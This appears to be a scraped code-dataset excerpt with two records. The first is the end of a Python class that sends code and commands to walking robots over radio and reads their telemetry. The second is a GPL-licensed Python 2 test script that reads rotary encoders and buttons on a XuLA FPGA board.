print("telemetry: "+str(self.address[4])+" "+str(self.telemetry[0])+" "+str(self.telemetry[9]))
# stop update requesting telemetry for a bit
self.ping_time=time.time()
def sync2(self,radio,beat,ms_per_beat):
reg_sets = []
radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
def walk_pattern(self,pat,ms_per_step,radio):
radio.send_pattern(self.address,pat,ms_per_step)
def calibrate(self,radio,do_cali,samples,mode):
return radio.send_calibrate(self.address,do_cali,samples,mode)
def load_asm(self,fn,compiler,radio):
with open(fn, 'r') as f:
self.source=f.read()
self.code = compiler.assemble_file(fn)
return radio.send_code(self.address,self.code)
def send_asm(self,asm,compiler,radio):
self.code = compiler.assemble_bytes(asm)
return radio.send_code(self.address,self.code)
def write(self,addr,val,radio):
radio.send_set(self.address,addr,val)
def save_eeprom(self,radio):
radio.send_save_eeprom(self.address)
# A register is cleared when the robot reaches it's end position
# and set by the Pi when we are ready to start again
def start_walking_set(self):
self.start_walking=True
def led_set(self,state):
self.set_led=True
self.led_state=state
# has been set above, and returned in a telemetry packet...
def is_walking(self):
return self.telemetry[yarnasm.registers["A"]]==1
def update(self,radio):
pass
def update_regs(self,regs):
regs["state"]=self.state
regs["ping"]=time.time()-self.ping_time
regs["pc"]=self.telemetry[yarnasm.registers["PC_MIRROR"]]
regs["a"]=self.telemetry[yarnasm.registers["A"]]
regs["b"]=self.telemetry[yarnasm.registers["B"]]
regs["comp_angle"]=self.telemetry[yarnasm.registers["COMP_ANGLE"]]
regs["comp_dr"]=self.telemetry[yarnasm.registers["COMP_DELTA_RESET"]]
regs["comp_d"]=self.telemetry[yarnasm.registers["COMP_DELTA"]]
regs["step_count"]=self.telemetry[yarnasm.registers["STEP_COUNT"]]
regs["step_reset"]=self.telemetry[yarnasm.registers["STEP_COUNT_RESET"]]
regs["robot"]=self.telemetry[yarnasm.registers["ROBOT_ID"]]
| [
"[email protected]"
] | |
17ba77f176141d459e81985f43e229f7ca668faf | d6d4449df702ab59a13559aaba599c60381d1852 | /tests/rot_enc_test.py | 1a121982d07371e9b5706f6ec0329ecc102aefc0 | [
"CC-BY-4.0"
] | permissive | zzfd97/StickIt-RotaryEncoder | c58ce2758676285d6ce539e895b6a5d01b451396 | 78c5511192fd471e57bc9b6b6ab5d1393ecdb0f3 | refs/heads/master | 2021-12-12T18:56:36.702963 | 2017-02-12T04:00:09 | 2017-02-12T04:00:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,614 | py | # /***********************************************************************************
# * This program is free software; you can redistribute it and/or
# * modify it under the terms of the GNU General Public License
# * as published by the Free Software Foundation; either version 2
# * of the License, or (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# * 02111-1307, USA.
# *
# * (c)2013 - X Engineering Software Systems Corp. (www.xess.com)
# ***********************************************************************************/
from xstools.xsdutio import * # Import funcs/classes for PC <=> FPGA link.
print '''\n
##################################################################
# This program tests the interface between the host PC and the FPGA
# on the XuLA board that has been programmed to scan a rotary encoder.
# You should see the state of the rotary encoder accumulator
# displayed on the screen.
##################################################################
'''
USB_ID = 0 # This is the USB port index for the XuLA board connected to the host PC.
ROTENC1_ID = 1 # This is the identifier for the rotary encoder 1 interface in the FPGA.
ROTENC2_ID = 2 # This is the identifier for the rotary encoder 2 interface in the FPGA.
BUTTONS_ID = 3 # This is the identifier for the buttons on rotary encoders 1 & 2.
# Create an interface object that reads one 32-bit output from the rotary encoder module and
# drives one 1-bit dummy-input to the rotary encoder module.
rotenc1 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC1_ID, dut_output_widths=[32], dut_input_widths=[1])
rotenc2 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC2_ID, dut_output_widths=[32], dut_input_widths=[1])
buttons = XsDutIo(xsusb_id=USB_ID, module_id=BUTTONS_ID, dut_output_widths=[2], dut_input_widths=[1])
while True: # Do this forever...
accumulator1 = rotenc1.Read() # Read the ROT1 accumulator.
accumulator2 = rotenc2.Read() # Read the ROT2 accumulator.
bttns = buttons.Read() # Read the ROT1 and ROT2 buttons.
print 'ROT1: {:8x} {:1x} ROT2: {:8x} {:1x}\r'.format(accumulator1.unsigned, bttns[0], accumulator2.unsigned, bttns[1]),
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.